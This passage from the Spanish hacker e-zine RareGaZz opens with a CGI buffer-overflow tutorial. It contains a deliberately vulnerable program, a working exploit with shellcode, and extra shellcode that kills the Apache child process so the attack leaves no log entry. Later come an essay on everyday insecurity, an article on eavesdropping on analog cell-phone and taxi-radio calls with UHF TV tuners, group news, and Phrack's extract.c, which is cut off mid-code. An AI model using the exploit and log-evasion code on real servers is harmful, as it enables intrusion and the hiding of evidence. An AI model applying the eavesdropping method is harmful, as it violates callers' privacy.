Entonces al hacer un brk(0x1090) esto queda asi

,---------------. --- 0x1000
| Codigo |
| ejecutable |
| |
|---------------|---- 0x1060
| Datos |
_ |_______________|___ 0x1080
| : :
Heap|_ :...............:___ 0x1090

Entonces nos queda 0x10 bytes de memoria donde podemos guardar datos.
Ahora digamos que tenemos un prog de este tipo.

main() {
char *ptr;
char buf[256];

ptr = malloc(stlren(getenv(HTTP_USER_AGENT)));
strcpy(ptr, getenv(HTTP_USER_AGENT));
strcpy(buf, getparam("
data"));
}

cada vez que sea cargado, el puntero 'ptr' tendra la misma direccion en
memoria ya que el tama~o del programa no cambia, entonces solo tenemos que
usar 'ptr' como direccion de retorno. Aqui se necesita obviamente acceso
al binario para saber la posicion mas baja.


No dejar logs
+=+=+=+=+=+=+

Agregando este pedazo de codigo a una shellcode (antes del exit), nos da
la posibilidad de no dejar logs en los webservers Apache.

char no_logs[14] = {
"
\x6a\x27\x58\xcd\x80\x6a\x09\x50\x50\x6a\x25\x58\xcd\x80"
};


El webserver al recibir una peticion de conexion, crea un nuevo proceso
para atenderla, entonces si esta es a un CGI, crea un nuevo proceso para
ese CGI. El webserver espera a que termine de ejecutarse el CGI para
escribir el log correspondiente, pero que pasa si lo matamos? no hay nadie
que escriba el log. Para entenderlo mejor aqui hay un esquema:

httpd
`-- httpd (hijo)
`--- cgivul

el shellcode que enviamos a cgivul mata al httpd hijo, el cual es el
encargado de escribir el log correspondiente. Por lo tanto no se escribe
el log.

Prueba
+=+=+=

Imaginemos un programa CGI vulnerable:

<++> cgibof/cgivul.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char agent[1024];

void main()
{
char buf[256];

printf("
Content-type: text/html\r\n\r\n");
if(!getenv("
QUERY_STRING"))
exit(0);
strcpy(agent, getenv("
HTTP_USER_AGENT"));
strcpy(buf, getenv("
QUERY_STRING"));
printf("
%s\n", buf);
}
<-->

Lo compilamos y lo copiamos al directorio 'cgi-bin', ahora para explotarlo
necesitamos una direccion de retorno, sabemos que las variables globales
no cambian su direccion, asi que buscamos la direccion de 'agent' con la
ayuda del programa objdump, la cual es 0x2130.

Hacemos un peque~o shellcode que imprime:

Content-type: text/html

Exploited!

y al final le agregamos codigo para que no deje logs.



<++> cgibof/exp_cgivul.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>

char shellcode[] = {
"
\x31\xc0\x6a\x26\xeb\x25\x5e\x56\xff\x4e\x18\xff\x4e\x1a\xff\x4e"
"
\x25\x6a\x01\x50\xb0\x04\xcd\x80\x6a\x27\x58\xcd\x80\x6a\x09\x50"
"
\x50\x6a\x25\x58\xcd\x80\x50\xb0\x01\xcd\x80\xe8\xd6\xff\xff\xff"
"
\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x3a\x20\x74\x65"
"
\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0b\x0d\x0b\x45\x78\x70\x6c\x6f"
"
\x69\x74\x65\x64\x21\x0b"
};

void
main()
{
int i, fd;
char buf[300];
unsigned long addr = 0x2130;
struct sockaddr_in sa;
FILE *fp;

for(i=0;i<260;i++)
buf[i] = 'A';
*((long *)&buf[i] ) = addr;

fd = socket(AF_INET, SOCK_STREAM, 0);

sa.sin_family = AF_INET;
sa.sin_port = htons(80);
sa.sin_addr.s_addr = inet_addr("
127.0.0.1");

connect(fd, (struct sockaddr *) &sa, sizeof(sa));
fp = fdopen(fd, "
r+");

fprintf(fp, "
GET /cgi-bin/cgivul?%s HTTP/1.0\r\nUser-Agent: %s\r\n\r\n", buf, shellcode);
fflush(fp);
bzero(buf, sizeof(buf));
while(read(fd, buf, sizeof(buf) - 1)) {
puts(buf);
bzero(buf, sizeof(buf));
}
}
<-->

Si revisas el shellcode notaras que hay 3 instrucciones decl 0x??(%esi),
estas decrementas los bytes \x0b a \x0a (NL), ya que si lo pusieramos como
\x0a el webserver lo tomaria como el fin del header no copiando todo el
shellcode.

Ahora compilamos el exploit, y lo ejecutamos

ocsic$ ./exp_cgivul
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2001 15:06:08 GMT
Server: Apache/1.3.12 (Unix) mod_ssl/2.6.6 OpenSSL/0.9.5a
Connection: close
Content-Type: text/html

Exploited!

ocsic$

revisamos la ultima entrada en el access_log y vemos que no fue escrita
la peticion a /cgi-bin/cgivul, revisamos el error_log y nada.

_EOF_



<<::RareGaZz::>>
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_06 Estamos Seguros? Opinion Angel Protector
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::



La sensacion de inseguridad, es uno de los primeros sintomas que
experimentamos al nacer.
Si no padecieramos de la memoria limitada que caracteriza a la especie
humana, seguramente recordariamos el nacimiento como una de nuestras
experiencias mas traumaticas.

Inmediatamente despues de salir de aquel mundo en el que pasamos nuestros
primeros nueve meses, aquel lugar en el que realmente nos sentiamos seguros,
comenzamos a experimentar la inseguridad por primera vez en nuestras vidas.
Esta termina cuando al fin recibimos el primer abrazo de nuestra madre. Y
esa, quizas... sea la primer sensacion de seguridad que percibimos.

Imagino la seguridad como la suma de los factores que generan como accion, la
sensacion de estar seguro.

~~~~~~~~~~~~~~~

A medida que pasan los a~os los elementos a proteger van cambiando. Hoy en
dia la informacion, es considerada, un activo muy importante, digno de ser
protegido.
Tanto las personas en general, como asi tambien las empresas y los gobiernos,
requieren de tecnologia que les permita contener, administrar y explotar esta
informacion de forma que genere beneficios radicales.

La tecnologia se encuentra de multiples formas en la vida diaria, en
aplicaciones tan diversas que van desde el instrumental de un dentista, hasta
las centrales nucleares.
Pero la gran mayoria de nosotros convivimos diariamente con dispositivos
tales como los telefonos, las computadoras, los equipos de fax, las redes de
datos, etc.

Muchas veces y sin siquiera saberlo, hacemos uso en forma directa o indirecta
de cientos de servidores, bases de datos, redes de comunicaciones, etc.

~~~~~~~~~~~~~~~

Ahora, hagamos un ejercicio juntos. Usted sabe por ejemplo, cuanta gente
escucha lo que usted habla por telefono, aparte de la persona a quien usted
dirigio la llamada?.
Bueno, dejeme decirle que es muy probable que nadie este interesado en lo que
usted habla con su amiga, con lo cual por ese lado puede quedarse tranquilo,
pero el echo es que en la mayoria de los casos la informacion de su voz
circula de una u otra forma por una red, la cual se encuentra afectada a los
posibles fallos de cualquier desarrollo tecnologico.
Ayer, cuando realizo la extraccion de su sueldo desde el cajero automatico
del centro de la ciudad, a quien le envio su contrase~a? Si... ok usted tipio
su codigo personal en ese aparato.. nunca se lo dijo a nadie, solo a ese
aparato... pero... que mas da... ese dato, su codigo personal, se encuentra
almacenado en algun tipo de base de datos, la cual es (Y espero no
decepcionarlo) operada o administrada en mayor o menor medida por una
persona, con lo cual este seguro que usted no es el unico que conoce la clave
de acceso a sus cuentas.

Pero al fin, usted llega a su oficina, se sienta en su escritorio y se
dispone a entrar a la red de su empresa para ponerse a trabajar, y para si
mismo se dice "
Ok, menos mal que mis datos estan protegidos por contrase~a y
encriptados por ese software nuevo que compramos por xxxxxx!! pesos!!".
Pero... otra vez, usted no entro a Internet para otra cosa que no sea
chatear? no transito alguna de esas oscuras paginas de las cuales se
pueden descargar cientos de programas gratuitos que recuperan contrase~as
perdidas de los mas diversos sistemas operativos??
Esta bien... eso si... usted tiene sus datos encriptados... y eso es
bueno... pero aun asi no existe el algoritmo indescifrable, o le queda alguna
duda?.

Bueno, mejor termine rapido su trabajo, tome un taxi hasta el centro y para
terminar con tanta paranoia compre un lindo obsequio para su amiga. Que?
tarjeta de credito?? Ok, si asi lo quiere.
Pero antes sepa que no hay nada mas sencillo que... veamos esta situacion.
Usted entra al local de ropa. Realiza su compra. Mientras una persona le
envuelve su obsequio, otra seguramente estara pidiendo su codigo de
autorizacion y se quedara luego con la copia de su cupon. Ahora bien, que es
lo que impide a un empleado endemoniado, conectarse en ese preciso momento a
Internet a alguna de esas paginas pornograficas, y suscribirse gratis al
"
Club de los Corazones Solitarios" utilizando su numero de tarjeta, tipo de
tarjeta, y fecha de expiracion?

~~~~~~~~~~~~~~~

Las formas de la inseguridad en la era informatica son de los mas variadas
que se nos puedan ocurrir. Estas situaciones, si bien estan exageradas, estan
basadas en situaciones reales y factibles con mayor o menor facilidad.
A quienes culpar entonces por la inseguridad? Bueno... hay mucha
responsabilidad para repartir.
En primer lugar las empresas de software. Ellas son quienes privilegian sus
campa~as de marketing basados en lo que la mayoria de los usuarios por
desconocimiento prioritizan. Lindas interfaces, faciles de usar, y si es
posible que se instalen solas y sin administracion.

Estoy cansado de observar como al dia de hoy surgen mas y mas
vulnerabilidades en sistemas operativos o utilitarios de uso masivo. Que
tardan horas y a veces mucho mas que eso en solucionarse.

Pero eso si, siendo sincero, nosotros los usuarios, los administradores de
sistemas, y la comunidad tecnologica en su mayoria,no esta educada ni tiene
asimilado el concepto de seguridad.

Estoy convencido que parte de la respuesta a esto vendra con el tiempo, y
despues de haber ganado disgustos suficientes. Seguramente en esta epoca
usted ya puso alarma a su auto, o se fija a quien le abre la puerta. Muchas
de estas acciones las realiza como algo normal, algo conocido, de todos los
dias.

Cuando la tecnologia, desembarque por completo en nuestras vidas, tendremos
que estar preparados para hablar de metodos de encripcion, passwords de
seguridad, o antivirus como hoy lo estamos para hablar del ultimo avance en
puertas blindadas o alarmas.

Pero no se preocupe, una nueva generacion se esta formando, una generacion a
la cual incluso hoy en dia, no le resulta extra~o conocer mediante Internet a
un amigo en cuba, EEUU o la URSS. Ni tampoco le resulta dificil entender
porque tiene que bajar la ultima actualizacion del antivirus que utiliza.
Solo nos resta guiarla en los conceptos que no cambian con el tiempo,
aquellos que se siguen ense~ando desde sus origenes: la conducta, el saber
bien aplicado y el eterno combate contra los malos.



<<::RareGaZz::>>
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_07 Celulares & TV. Frecuencias ReYDeS
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::



I Introduccion. :)
II Descripcion. ;)
III Explicacion. ]:D
IV Algo mas. >:)
V Despedida. :(



I INTRODUCCION:

En este escrito, se tratara un interesante fenomeno, que involucra al sistema
de telefonia celular de Telefonica del Peru, a los aparatos sintonizadores
(TV), y algo mas que pueda sernos de utilidad para enriquecer el presente
texto.

Cabe la siguiente acotacion: Intuyo que la escucha de conversaciones
telefonicas realizadas por otros usuarios debe ser ilegal; asi es que yo no me
hago responsable del uso que hagas con esta informacion.

No os entretengo mas con este preludio, tomad un cafe en mi nombre. :)



II DESCRIPCION:

La inquietud y el realizar acciones poco 'normales', siempre conduce a
situaciones de las cuales uno puede sacar algun provecho; en este caso, he
aprendido un poco mas sobre el funcionamiento del sistema de telefonia
celular, el cual me resulta interesante en su concepcion y funcionamiento.
Aunque apenas estoy en mis pininos con ello.

El punto es simple. Cierto dia, en un desacostumbrado movimiento de
sintonizacion supuestamente 'inutil', mis oidos percibieron una conversacion,
la cual desaparecio en pocos segundos; me quede intrigado, que era ello?.

Mi televisor analogico :D B/N habia sintonizado una conversacion la cual
pertenecia obviamente al sistema de telefonia celular de telefonica del
Peru. Hize la prueba con otro televisor a color Sony, y con la mayor
precision, que este me permitio; pude localizar el canal en el cual era
posible 'escuchar' estas conversaciones.

La pregunta cae por defecto. Porque es posible esto?. He aqui en donde
empieza mi modesta investigacion, disfrutadla.



III EXPLICACION:

El espectro electromagnetico es el mapa de posibles frecuencias de que
disponemos para se~ales electromagneticas. Y el siguiente cuadro aclarara esta
'tecnica' explicaion:

---------------------------------------------
MF - Frecuencia Media 30 - 300 KHz
(AM) (0.3 - 3 MHz)
---------------------------------------------
HF - Frecuencia Alta 3 - 30 MHz
(Banda de onda corta)
---------------------------------------------
VHF - Frecuencias muy 30 - 300 MHz
Altas
(Canales 2 al 13)
---------------------------------------------
UFH - Frecuencias ultra 300 - 3000 MHz
Altas (0.3 - 3 MHz)
(Celulares de 800 MHz
GSM de 900 MHz y
PCS-1900 de 1.9 GHz)
---------------------------------------------
SHF - Frecuencias Super 3 - 30 GHz
Altas
---------------------------------------------
Cuadro 1


Las frecuencias en las que operan los canales de Television son la VHF y UHF,
como se puede apreciar en el cuadro 1. Lo que nos concierne; es decir, canal
14 hasta el canal 83; se reparten de la siguiente manera:


------------------------
Canal Frecuencia (Mhz)
------------------------
14 470 - 476
20 506 - 512
30 566 - 572
.. ... ...
70 806 - 812
80 866 - 872
83 884 - 887
------------------------
Cuadro 2


Ahora bien, por ser una sintonizacion 'analogica' es un poco imprecisa en
algunos aspectos; es necesario una buena presicion en el televisor, asi es que
comprobando el 'aparente' canal en el cual se escuchaban las conversaciones en
2 televisores; llegue a la primera conclusion; que este se encontraba entre el
canal 80 u 81.

NOTA: Recordar aqui, que utilizo televisores analogicos para esto, es los mas
modernos NO he podido captar nada en lo que respecta a conversaciones
telefonicas.

Me concentro ahora en el canal 80 y alrededores. Los canales UHF cubren cada
no 6 Mhz, con la ayuda del anterior cuadro 2, puedo dilusidar lo siguiente.
Otro cuadro. X)


------------------------
Canal Frecuencia (Mhz)
------------------------
79 860 - 866
80 866 - 872
81 872 - 878
82 878 - 884
83 884 - 887
------------------------
Cuadro 3


La antena que se utiliza en los sistemas de television 'abierta' emite una
se~al a una determinada frecuencia, la cual porta entre otra informacion, la
imagen y el sonido. En el caso del sonido esta se modula en frecuencia.

Un televisor es finalmente un sintonizador, las se~ales son 'captadas' por la
antena y luego manipuladas por las diferentes 'etapas' de este; hasta que
finalmente nos muestra el resultado final; lo cual es la imagen y sonido. Con
esta 'reducida' informacion, notamos que la sintonizacion de las frecuencias
que utiliza el sistema de telefonia celular, es Evidentemente posible.


Habiendo localizado las frecuencias en las que operan los canales de se~al
abierta. Es momento de tocar al sistema de telefonia celular.

Haciendo una rapida y anonima visita al ente encargado de regular las
comunicaciones en el Peru, encontre la siguiente informacion:

Telefonia movil celular

Este servicio cuenta con redes 90 % digitales, los operadores de
celulares en la banda de 800 MHz, estan migrando sus redes
analogicas a digitales.

* Banda 824 - 849 Mhz. (Recepcion)
* Banda 869 - 894 Mhz. (Transmision)


Esto es simple; la comunicacion entre la estacion base y nuestro equipo
movil, se realiza entre las frecuencias 869-894 MHz; y la comunicacion entre
nuestro equipo movil y la estacion base, se realiza en las frecuencias 824-849
MHz.

Si han tomado interes en los rangos de frecuencias utilizados por los canales
UHF y los que anteriormente he mencionado; podemos inferir lo siguiente:

* Las frecuencias entre los 869 MHz a 894 MHz utilizados por los 'forwards
channels', estan comprendidas en las frecuencias utilizadas por el canal 80
UHF y superiores. Y ademas:

* Las frecuencias entre los 824 MHz a 849 MHz utilizados por los 'reverses
channels', estan comprendidas en las frecuencias utilizadas por el canal 72
UHF y las que siguen. (Ver el siguiente cuadro.)

------------------------
Canal Frecuencia (Mhz)
------------------------
71 812 - 818
72 818 - 824
73 824 - 830
74 830 - 836
75 836 - 842
------------------------
Cuadro 4


Las conclusiones a las que ha sido posible llegar, concuerdan con las
'proyecciones' que habia intuido. Es decir; lo que mis oidos percibian en el
canal 80 UHF de mi TV. son las comunicaciones realizadas entre la Estacion
Base y el Equipo Movil. :)

Luego me percate de la posibilidad de escuchar conversaciones con mucha menos
'claridad' en los canales arriba del 80. Coligando la informacion de los
cuadros anteriores, se aprecia que en los canales 81 al 83, teoricamente seria
posible 'escuchar' conversaciones telefonicas. Y llevando la teoria a la
practica, sintonizando dichos canales es tambien posible escuchar
conversaciones, aunque con menos frecuencia.

Volviendo nuevamente la mirada al 'ente encargado' de las telecomunicaciones,
me presenta lo siguiente:

La banda A y la banda B ya han sido asignadas.

-------------------------------------------
Banda A : 825.0-835.0 / 870.0-880.0 Mhz.

Banda A' : 845.0-846.5 / 890.0-891.5 Mhz.

Banda A'': 824.0-825.0 / 860.0-870.0 Mhz.

Banda B : 835.0-845.0 / 880.0-890.0 Mhz.

Banda B' : 846.5-849.0 / 891.5-894.0 Mhz.
(rurales fuera de la ciudad de Lima)
-------------------------------------------
Cuadro 5


Observando el cuadro 3 y 5 y teniendo en consideracion que las conversaciones
pertenecen al sistema de Telefonica del Peru, es logico suponer que la Banda A
es la asignada a esta empresa; al ser esta la primera en implementar este
servicio de telefonia celular en Peru.

La banda comprende 870.0 a 880.0 Mhz, las cual reconfirma las frecuencias de
los canales 80 al 82. Lo mismo podemos inferir para las frecuencias 825.0 -
835.0 Mhz.


La pregunta que todo lo anterior produce en mi es: Porque utilizar bandas
UHF?

La respuesta mas 'simple' que encontre fue esta:

-Porque estan disponibles. ;)

Ademas, las bandas VHF y anteriores, son bandas no disponibles. Unas razones
tecnologicas: La UHF utiliza propagacion de linea de vista. Las bandas MF, HF,
son bandas de onda corta, impracticas para los celulares. La banda SHF
requiere componentes de mucho costo.


Otra AUTOpregunta es: Donde queda mi privacidad?.

Si quisiese privacidad, podria utilizar la tecnologia GSM; la cual utiliza un
algoritmo para este proposito; o utilizar telefonos encriptados.

Con mi celular Analogico, dudo mucho que puede tenerla. Asi es que no hablar
asuntos comprometedores cuando llameis por celular. Seguro que muchos de
ustedes saben a lo que me refiero, he escuchado conversaciones muy
'interesantes' y comprometedoras. La que mas recuerdo es una conversacion
entre una pareja, pasadas las 23 horas, muchisimo mejor que una HotLine. :)



IV ALGO MAS:

Trunking:

Ademas de lo anteriormente expuesto, existe un sistema de comunicacion, el
cual es utilizado por algunas empresas que necesitan comunicarse por radio.
Para este caso en especifico, me refiero a los que utilizan las empresas de
taxis; los cuales utilizan un rango de frecuencias para comunicacion entre su
'estacion' central y los 'moviles' taxis.

Tambien me ha sido posible escuchar estas conversaciones; lo he comprobado
con un televidor Sony de penultima generacion :), y tambien en mi modesto tv
B/N, y las frecuencias oscilan entre los canales 19 al 23 de la banda UHF.


Celulares:

El tema de las escuchas mediante un telefono celular; ha sido y es
ampliamente tratado en internet; puedes obtener informacion especifica para el
modelo y marca del movil que poseas.

Para un motorola analogico; como el mio; existen 5 o 4 canales mediante los
cuales es posible escuchar conversaciones. Al momento de escribir este texto
es posible escuchar conversaciones del sistema de telefonia celular de la
BellSouth. Anteriormente era tambien posible escuchar el sistema de
telefonica.


Situacion Geografica:

Como penultimo acapite debo 'revelar' algunos datos de mi posicion
geografica. Me encuentro literlamente rodeado de 3 torres base, la mas cercana
a unos 400 metros, pertenece a Telefonica del Peru, un poco mas lejos tengo a
una de la BellSouth, y unos cuantos metros respecto a esta ultima, una de TIM.
Con linea de vista a la TB de Telefonica.

Lo anterior lo menciono; si en tu caso particular; no podeis escuchar
'conversaciones' telefonicas con vuestro televisor, ni tampoco otros se~ales
que viajen por alli, como las frecuencias utilizadas por los taxistas. :)



V DESPEDIDA:

Motivo a ustedes recuerden lo siguiente: -En nuestra vida 'cotidiana' estamos
rodeados de evolutivas oportunidades para aprender sobre diversos asuntos, y
aplicar nuestros conocimientos para dilucidar algunos.

Seria agradable para mi, 'conocer' las experiencias de ustedes al poner el
practica todo esto.

Simpre encontraran mi e-mail actual, es la seccion STAFF de la Web de
RareGaZz.

Sera hasta una proxima oportunidad.




"
...gracias... y bueno... si quieres puedes encontrarme
en Internet o quizas en alguna otra red..."

A.

<<::RareGaZz::>>
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_08 Pandemonium RareGaZz Rare-Team
:

  
:.:..:...:....:.....:......:.......:........:.........:..........: : : ::::


Pandemonium: m. Capital imaginaria del infierno. || Fig. Sitio donde hay mucho
ruido y agitacion.

'.
:
' ' ' ' ' ' '
Aqui se exponen asuntos referentes a los diferentes aspectos de RareGaZz;
comunicados, comentarios, peticiones, saludos, etc, etc.

Aqui es tangible la "libertad" de expresion para cada uno de los integrantes
de RareGaZz.

Deberia colocar que NO me hago responsable de lo publicado aqui; pero SOY
responsable de todas maneras. Sin abusar por favor ;).

' ' ' ' ' ' ' ' '.
:

[+] Decir a todos que dirigan sus navegadores a la siguiente url:

http://raregazz.cjb.net

Y si por 'extra~as' causas desaparecemos de ese dominio, con la ayuda de
cualquier buen buscador, debe ser relativamanete facil dar con nosotros.


[+] Y como podran apreciar, 'tenemos una bonita web', gracias a nuestro amigo
y compa~ero Ocsic; cualquier comentario, ya sabeis a quien dirigirlo.


[+] RareGaZz esta aceptando nuevos miembros, si quereis mas detalles; ver el
index de nuestra web o enviar un mensaje a Ocsic o ReYDeS. De parte de
todo el Team, damos la bienvenida a:

[-] MagiCs


[+] Y miemtras unos llegan, otros se van; desde aqui saludamos y desear lo
mejor a nuestros amigos:

[-] GuyBrush
[-] y0ni

Y sabeis que siempre tendreis la puertas abiertas en RareGaZz. ;)

RareTrip?... Bueno, en donde quiera que estes, saludos a ti tambien.


[+] Traduccion de la Phrack:

Como muchos de ustedes deben saber; el proyecto de traduccion de los
textos de esta mitica revista; esta nuevamente activa. Ya hubo algunas
coordinaciones; pero es necesario muchas mas. Si deseais colaborar enviar
un mensaje a ReYDeS, colocando en el subject Phrack.


[+] RareDudeZ:

La lista de los RareDudeZ, ha estado detenida durante algun tiempo, a
causa de algunos problemas internos. Pero ya esta nuevamente en
funcionamiento, y sigue siendo Moderada. Enviar,

Para subscribirse: raredudez-subscribe@yahoogroups.com

Para DEsubscribirse: raredudez-unsubscribe@yahoogroups.com


[+] Con el mayor gusto, recibiremos todo aquel material 'informatico' que
deseis enviarnos. DE ser informacion sensible, usad PGP.


[+] Cualquier comentario, sugerencia, palabras de animo, exhortaciones,
exclamaciones, interrogantes, preguntas capciosas, y un largo ETC; hacedlo
a nuestro e-mail:

RareGaZz-Ezine@Bigfoot.com


[+] Morfemas de los miembros de RareGaZz:

[-] Ocsic

Saludos a mis amigos y amigas (que no creo que lleguen a leer esto) y
a los miembros de RareGaZz (que si van a leerlo).


[-] ^Shadown^

[-] ReYDeS

Saludar a todos mis amigos, y en especial a mis amigas: Ma, So, Er,
De, Le, Pa, Sa, etc, etc, etc, y todas las que vendran. ;)


[-] alt3kx_h3z

[-] MagiCs

Nada, solo deciros gracias por aceptarme en el grupo y que hare todo
lo que pueda pero que opino que el grupo no es solo para ense~ar sino
tambien para aprender, espero que no todo sea la E-Zine en el grupo
por que sino... Quiero Aprender !!!
Todavia no he tenido el gusto de conocer a los demas, asi que espero
tenerlo pronto.
Un saludo a todos y a cuidarse !!!


[+] Se preguntais: Cuando estara lista RareGaZz 19?. Pues; por la periocidad
seguida hasta ahora; lo pronostico para Diciembre del 2002 :) Pero
cualquier cosa puede pasar y hasta puede salir antes. ;)



<<::RareGaZz::>>
: :.:..:...:....:.....:......:.......:........:.........:..........: : : :
: : : :
RGZ_09 extract.c Utilidad Phrack
: :.:..:...:....:.....:......:.......:........:.........:..........: : : :


/*
* extract.c by Phrack Staff and sirsyko
*
* Copyright (c) 1997 - 2000 Phrack Magazine
*
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*
* extract.c
* Extracts textfiles from a specially tagged flatfile into a hierarchical
* directory structure. Use to extract source code from any of the articles
* in Phrack Magazine (first appeared in Phrack 50).
*
* Extraction tags are of the form:
*
* host:~> cat testfile
* irrelevant file contents
* <++> path_and_filename1 !CRC32
* file contents
* <-->
* irrelevant file contents
* <++> path_and_filename2 !CRC32
* file contents
* <-->
* irrelevant file contents
* <++> path_and_filenamen !CRC32
* file contents
* <-->
* irrelevant file contents
* EOF
*
* The `!CRC` is optional. The filename is not. To generate crc32 values
* for your files, simply give them a dummy value initially. The program
* will attempt to verify the crc and fail, dumping the expected crc value.
* Use that one. i.e.:
*
* host:~> cat testfile
* this text is ignored by the program
* <++> testarooni !12345678
* text to extract into a file named testarooni
* as is this text
* <-->
*
* host:~> ./extract testfile
* Opened testfile
* - Extracting testarooni
* crc32 failed (12345678 != 4a298f18)
* Extracted 1 file(s).
*
* You would use `4a298f18` as your crc value.
*
* Compilation:
* gcc -o extract extract.c
*
* ./extract file1 file2 ... filen
*/



#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <dirent.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

#define VERSION "7niner.20000430 revsion q"

#define BEGIN_TAG "<++> "
#define END_TAG "<-->"
#define BT_SIZE strlen(BEGIN_TAG)
#define ET_SIZE strlen(END_TAG)
#define EX_DO_CHECKS 0x01
#define EX_QUIET 0x02

struct f_name
{
u_char name[256];
struct f_name *next;
};

unsigned long crcTable[256];


void crcgen()
{
unsigned long crc, poly;
int i, j;
poly = 0xEDB88320L;
for (i = 0; i < 256; i++)
{
crc = i;
for (j = 8; j > 0; j--)
{
if (crc & 1)
{
crc = (crc >> 1) ^ poly;
}
else
{
crc >>= 1;
}
}
crcTable[i] = crc;
}
}


unsigned long check_crc(FILE *fp)
{
register unsigned long crc;
int c;

crc = 0xFFFFFFFF;
while( (c = getc(fp)) != EOF )
{
crc = ((crc >> 8) & 0x00FFFFFF) ^ crcTable[(crc ^ c) & 0xFF];
}

if (fseek(fp, 0, SEEK_SET) == -1)
{
perror("fseek");
exit(EXIT_FAILURE);
}

return (crc ^ 0xFFFFFFFF);
}


int
main(int argc, char **argv)
{
char *name;
u_char b[256], *bp, *fn, flags;
int i, j = 0, h_c = 0, c;
unsigned long crc = 0, crc_f = 0;
FILE *in_p, *out_p = NULL;
struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL;

while ((c = getopt(argc, argv, "cqv")) != EOF)
{
switch (c)
{
case 'c':
flags |= EX_DO_CHECKS;
break;
case 'q':
flags |= EX_QUIET;
break;
case 'v':
fprintf(stderr, "Extract version: %s\n", VERSION);
exit(EXIT_SUCCESS);
}
}
c = argc - optind;

if (c < 2)
{
fprintf(stderr, "Usage: %s [-cqv] file1 file2 ... filen\n", argv[0]);
exit(0);
}

/*
* Fill the f_name list with all the files on the commandline (ignoring
* argv[0] which is this executable). This includes globs.
*/

for (i = 1; (fn = argv[i++]); )
{
if (!head)
{
if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
{
perror("malloc");
exit(EXIT_FAILURE);
}
strncpy(head->name, fn, sizeof(head->name));
head->next = NULL;
fn_p = head;
}
else
{
if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
{
perror("malloc");
exit(EXIT_FAILURE);
}
fn_p = fn_p->next;
strncpy(fn_p->name, fn, sizeof(fn_p->name));
fn_p->next = NULL;
}
}
/*
* Sentry node.
*/

if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
{
perror("malloc");
exit(EXIT_FAILURE);
}
fn_p = fn_p->next;
fn_p->next = NULL;

/*
* Check each file in the f_name list for extraction tags.
*/

for (fn_p = head; fn_p->next; )
{
if (!strcmp(fn_p->name, "-"))
{
in_p = stdin;
name = "stdin";
}
else if (!(in_p = fopen(fn_p->name, "r")))
{
fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
fn_p = fn_p->next;
continue;
}
else
{
name = fn_p->name;
}

if (!(flags & EX_QUIET))
{
fprintf(stderr, "Scanning %s...\n", fn_p->name);
}
crcgen();
while (fgets(b, 256, in_p))
{
if (!strncmp(b, BEGIN_TAG, BT_SIZE))
{
b[strlen(b) - 1] = 0; /* Now we have a string. */
j++;

crc = 0;
crc_f = 0;
if ((bp = strchr(b + BT_SIZE + 1, '/')))
{
while (bp)
{
*bp = 0;
if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST)
{
perror("mkdir");
exit(EXIT_FAILURE);
}
*bp = '/';
bp = strchr(bp + 1, '/');
}
}

if ((bp = strchr(b, '!')))
{
crc_f =
strtoul((b + (strlen(b) - strlen(bp)) + 1), NULL, 16);
b[strlen(b) - strlen(bp) - 1 ] = 0;
h_c = 1;
}
else
{
h_c = 0;
}
if ((out_p = fopen(b + BT_SIZE, "wb+")))
{
fprintf(stderr, ". Extracting %s\n", b + BT_SIZE);
}
else
{
printf(". Could not extract anything from '%s'.\n",
b + BT_SIZE);
continue;
}
}
else if (!strncmp (b, END_TAG, ET_SIZE))
{
if (out_p)
{
if (h_c == 1)
{
if (fseek(out_p, 0l, 0) == -1)
{
perror("fseek");
exit(EXIT_FAILURE);
}
crc = check_crc(out_p);
if (crc == crc_f && !(flags & EX_QUIET))
{
fprintf(stderr, ". CRC32 verified (%08lx)\n", crc);
}
else
{
if (!(flags & EX_QUIET))
{
fprintf(stderr, ". CRC32 failed (%08lx != %08lx)\n",
crc_f, crc);
}
}
}
fclose(out_p);
}
else
{
fprintf(stderr, ". `%s` had bad tags.\n", fn_p->name);
continue;
}
}
else if (out_p)
{
fputs(b, out_p);
}
}
if (in_p != stdin)
{
